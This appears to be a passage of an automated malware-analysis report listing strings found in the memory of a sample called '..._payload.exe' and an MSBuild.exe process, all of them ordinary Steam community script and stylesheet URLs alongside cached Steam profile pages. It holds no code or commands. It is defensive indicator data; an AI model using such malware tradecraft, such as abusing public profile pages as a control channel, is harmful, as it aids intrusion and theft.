Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=Q4LAS9-JZwft&l=e
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, 
MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
